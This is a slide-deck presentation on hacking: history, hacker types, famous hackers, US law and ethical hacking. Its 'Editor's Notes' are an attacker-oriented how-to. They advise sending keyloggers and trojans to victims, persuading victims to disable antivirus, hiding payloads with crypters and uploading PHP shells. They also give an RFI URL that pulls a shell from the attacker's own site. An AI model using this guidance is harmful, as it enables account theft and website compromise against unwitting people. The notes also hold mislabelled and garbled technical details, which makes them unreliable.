2. What is hacking?
Hacking refers to an array of activities which are
done to intrude some one else’s personal information
space so as to use it for malicious, unwanted
purposes.
Hacking is a term used to refer to activities aimed at
exploiting security flaws to obtain critical information
for gaining access to secured networks.
3. Brief History:
o Started in 1878, when Alexander Graham
bell busted a few school boys trying to figure
out how the telephone worked.
o In the late 1950s and Early 1960's
~originally, "hacker" was a positive term for a
person with a mastery of computers who
could push programs beyond what they were
designed to do.
4. o1971- Cap 'n Cruch phone exploit discovered
o1988- Morris Internet worm crashes 6,000 servers
o1994- $10 million transfered from CitiBank accounts
o1995- Kevin Mitnick sentences to 5 years in jail
o1969- Unix 'hacked' together
o2000- Major websites succumb to DDoS
o2000- 15,700 credit and debit card numbers stolen from
oWestern Union (hacked while web database was undergoing
maintainance)
o2001- Code Red exploited bug in MS IIS to penetrate & spread
probes random IPs for system running IIS had
otrigger time for denial-of-service attack
o2nd wave infected 360000 servers in 14 hours
oCode Red 2- had backdoor installed to allow remote control
5. Types of Hackers :
White Hat
Non-malicious reasons, enjoy learning (ex. testing
their own security system)
Grey Hat
Beyond the point of a malicious intend
Black Hat/Cracker
Malicious reasons, uses technology for a wrong
end, linked to illegal activity
Script kiddie
Non-expert, uses automated tools by other
creators
6. Famous Hackers :
• Kevin Mitnick
~hacking into the telephone systems of the
Pentagon and Pacific Bell, among other
government agencies and for-profit
organizations. Not only did he hack phones,
he also gained access to countless credit card
numbers.
~black hat hacker
7. • Kevin Poulsen
~hacked a radio station's phone lines in order
to win a call-in contest whose prize was a
Porsche. He eventually earned the distinction
of being the first hacker charged with
espionage after he allegedly stole classified
information from the Air Force
~black hat hacker
8. • Tsutomu Shimomura
~decided to take his own revenge by using his
hacking skills to assist the FBI in tracking and
locating Mitnick. With Shimomura's help, they
were successful, and Mitnick was arrested.
~white hat hacker
9. • Stephen Wozniak
~Woz got his start in hacking making blue
boxes, devices that bypass telephone-
switching mechanisms to make free long-
distance calls
~white hat hacker
10. • Adrian Lamo
~"the homeless hacker" because he sometimes
took up residence in abandoned buildings.
~As a hacker, Lamo broke into the networks of a
number of major companies -- Excite@Home,
MCI WorldCom, Yahoo, Microsoft and Google --
but he often contacted the companies and told
them about the security holes.
~grey hat hacker
11. The Hacker Attitude
Boredom and drudgery are evil.
Hackers (and creative people in general) should
never be bored or have to drudge at stupid
repetitive work
Freedom is good
Hackers are naturally anti-authoritarian. Anyone
who can give you orders can stop you from solving
whatever problem you're being fascinated by
Becoming a hacker will take intelligence, practice,
dedication, and hard work.
12. The world is full of fascinating problems waiting to be
solved
Being a hacker is lots of fun, but it's a kind of fun
that takes lots of effort. The effort takes motivation.
To be a hacker you have to get a basic thrill from
solving problems, sharpening your skills, and
exercising your intelligence.
Nobody should ever have to solve a problem twice
Creative brains are a valuable, limited resource. To
behave like a hacker, you have to believe that the
thinking time of other hackers is precious -- so much
so that it's almost a moral duty for you to share
information, solve problems and then give the
solutions away just so other hackers can solve new
problems instead of having to perpetually re-address
old ones.
13. Basic Hacking Skill
Learn how to program.
This, of course, is the fundamental hacking skill. If you don't
know any computer languages, you cant do hacking.
Get one of the open-source Unix's and learn to use and run it
The single most important step any newbie can take towards
acquiring hacker skills is to get a copy of Linux or one of the
BSD-Unix’s, install it on a personal machine, and run it.
Learn how to use the World Wide Web and write HTML.
To be worthwhile, your page must have content -- it must be
interesting and/or useful to other hackers.
14. 2 types of hacking:
1. Email or the user information
a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans
2. Web based hacking.
a. SQL Injection
b. XSS
c. Shells
d. RFI
15. Forbidding Hacking:
• There are several laws that forbid hacking in the United
States. One, 18 U.S.C. 1029, deals with making and
using devices and programs to gain unauthorized
access to secure computer systems. Since the law
specifies that there must be intent to defraud,
however, hackers can often claim that they were only
doing harmless personal research. Another law, 18
U.S.C. 1030, prohibits access to government computers
to anyone without authorization [Source: U.S.
Department of Justice]. Hackers who are convicted of
crimes that violate these laws may be required to pay
fines, be placed on probation, or serve jail time,
depending on the severity of the damages.
16. What is ethical hacking?
defined “methodology adopted by ethical hackers to
discover the vulnerabilities existing in information systems’
operating environments.”
With the growth of the Internet, computer security has
become a major concern for businesses and governments.
In their search for a way to approach the problem,
organizations came to realize that one of the best ways to
evaluate the intruder threat to their interests would be to
have independent computer security professionals attempt to
break into their computer systems.
Editor's Notes
Initialization:Getting back to the main point, I am going to discuss some of the ways of hacking in brief. Hacking is basically bifurcated in 2 major parts.1. Email or the user information2. Web based hacking.Email or user information:These days the most commonly used and famous way of hacking user information like Emails, Passwords, Credit card details are as follow:a. Phishingb. Brute Forcingc. Keyloggingd. Trojansa. Phishing: Phishing is basically a massive attack. What a hacker does is, they created an absoulutely look alike page of some website like yahoo or gmail. They upload it to their own server. And give the link to any n00b user. When they open it, they think that they are on the yahoo or gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to entering into ahcking world.Most recent example in india was some scam with ICICI bank, lots of user info was stolen as far as i remember. I read it somewhere in the news paper and was thinking what the hell! ?Disadvantages: Still many people give it a try before going for phishing, because the only problem in phishing is, even if the victim knows a little about internet, he will read the URL and understand that it is not a genuine website.b. Brute Forcing Brute forcer is basically a program which could be called as a "cracker". In brute focer you put the username you want to hack, and as a password you put a notepad file which has almost all of the existing english words in it. So what it does is, it will try each and every word from that file and see if anything matches. You might have noticed some topics like "huge pass list" on different forums, they are nothing but the password list to put into your bruteforcer.!Disadvantages:1. Sometimes brute forcing may just go for ages!2. It isnt guaranteed3. These days many people have alpha-numeric-symbol password which is real tough for brutefocer to detect4. Most of the famous sites like yahoo, gmail are designed in such a way that it will put the "image captcha" after 3 incorrect login attempts, which stops the bruteforcer.P.S:- I have made some focused FTP, Gmail & Yahoo bruteforcers which are avilable on my website.c. KeyloggingKeylogger helps you to create a little filed which is known as "server". You gotta send your server to the victim. he has to click on it and then YOUR DONE! this is what happens.Best possible way to hack someone. Keyloggers are basically a program which will install themselves in your victim's computer and will keep on recording each and every keystroke pressed by the victim on his keyboard and it will send it to the hacker. There are many ways to receive the keystroke i.e. FTP, Email, Messengers. According to me this is the best way to trick your victim and get their information Disadvantages :1. When victim receives the keylogger, in most of the cases, their anti virus would auto delete them. So you have to convince them to desable the anti virus by bluffing something.2. Sometimes firewall blocks the keylogs from being sent.Tips :1. There are some programs which are known as "crypters" which will help you to make your server's undetectable. So your victim's anti-virus would not be able to detect them.d. Trojans: Trojans are like father of keyloggers. Trojan sends you the keylogs just as keyloggers, on top of that, it lets you take the control of victim's computer. Edit / delete/ upload / download files from or to their computer. Some more funny features like it will make their keyboard go mad, it may kep on ejecting and re-inserting the cd ROM. Much more..Disadvantages :Same as keyloggers.Tips :Same as keylogger.I will discuss some most commonly used web hacking techniques which helps hackers to hack any website. This will help you to SAVE YOUR SITE!1. SQL Injection2. XSS3. Shells4. RFI5. There are some more but they are TOOO big to be discussed in here.1. SQL Injection: Most of the websites these days are connected to an SQL Database. Which helps them to store usernames and passwords [encrypted] when a guest registers to their website. SQL database processes a querieeverytime a user logs in. It goes to the database, validates the password, if its correct then it logs in the user and if its not then it gives an error.So the basic funda is executing a command to parase a query in the database to try to exploit the internet information of the database. I cant really put the entire tutorial about because this is the most complicated way to hack the website! P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .If your site's URL is:Code:yoursite.com/index.php?id=545 just add a ' like this at the end Code:yoursite.com/index.php?id=545' 2. XSS: XSS is another nice way to ahck some website. Suppose if some website/ forum is allowing HTML in the psot or articles, then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can login as that user and f*ck the website up. 3. Shells: Shell is a malicious .php script. What you have to do is, find a palce in any website where you can upload any file like avatars, recepie, your tricks, your feedbacks. And you try to upload your shell files from there. And if its uploaded then WHOA!you open it from the URL bar and u can see the entire "FTP" account of that webhosting. YOu can rename/edit / upload/download anything u want including the index page.This is also known as deface.4. RFI: RFI is a good way to deface a website. It is used with shell. Suppose you have uploaded your shell on:Code:yoursite.com/shell.txt and you found a vulnerable site to RFI... then you can do as follow:Code:victimssite.com/index.php?page=yousite.com/shell.txt This will again give u the access of your victim's sites FTP , just as shell so you can f*ck up anything you want.P.S.:- If you wanna check if YOUR website is vulnerable to RFI attach or not then do the following .If your site's URL is:Code:yoursite.com/index.php?id=545 just add something liek this at the end Code:yoursite.com/index.php?id=http://www.google.com And if it incldes the google page into your page, that means its vulnerable to RFI.